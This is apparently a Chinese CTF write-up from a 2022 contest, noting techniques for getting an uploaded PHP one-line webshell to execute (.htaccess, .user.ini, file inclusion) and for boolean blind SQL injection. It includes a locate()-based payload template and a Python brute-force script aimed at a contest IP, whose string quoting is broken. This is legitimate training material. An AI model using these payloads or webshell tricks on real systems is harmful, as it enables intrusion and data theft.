【web-ctf】ctf月赛和升级赛

2022/10/2 升级赛-web

学到的知识点:

第一题:文件上传漏洞+文件包含漏洞

  1. 传入一个无法解析的一句话木马后,可以尝试

(1)上传.htaccess或.user.ini文件。
(2)还是无法解析的话,可以查找每个页面的源代码,看看有没有文件包含漏洞。
(3)还是无法解析的话,可以尝试查找服务器用的php版本、中间件版本等,看该版本下有没有漏洞。

  1. 上传文件后,可以查看以下网页源代码,有可能会返回文件上传后的位置
  2. 上传文件后,可以尝试访问以下该文件,看传入后的文件中的某些字符是否被过滤或修改,如有修改,则可以尝试传一些其他的一句话木马。

第二题:布尔盲注

  1. locate函数可以用于布尔盲注,局限性,表中只能有一个表项,否则就会返回错误。

payload:id=‘{}’/(select(locate(binary(‘{}’),结果所在列名,{}))from(结果所在表名))/‘1’

第一个和第三个位置,填入盲注的字符的位置;第二个位置填入盲注使用的字符的二进制编码(因为在传入普通字符串的时候,locate函数是大小写不敏感的,所以需要使用binary函数转换为二进制字符串来处理)

  1. strcmp函数可以用于布尔盲注
import requests as req
import pytricks
import string

chars = ' !"#$%&\'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz'
# chars = string.ascii_letters + string.digits + "_{}"
ans = 'flag{'
j = 0

for pos in range(1,80):
	for ch in chars:
		t = (ans + ch)
		t = t.ascii_format("char(%d)",",")
		t = f"concat({t})"
		payload=f"""'and(pow(999,bin(strcmp((select(flag)from(flag)),binary({t}))))
		res = req.post('http://124.16.75.162:31012/',params={"id":payload})
		if 'error 1690' in res.text:
			ans += chr(ord(ch)-1)
			break
		if 'hack' in res.text:
			print("hack")
			exit()
		if 'error ' in res.text:
			print(res.text)
			exit()
	print(ans)
  1. 常见的flag所在表名和列名为flag,即select flag from flag

题解

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值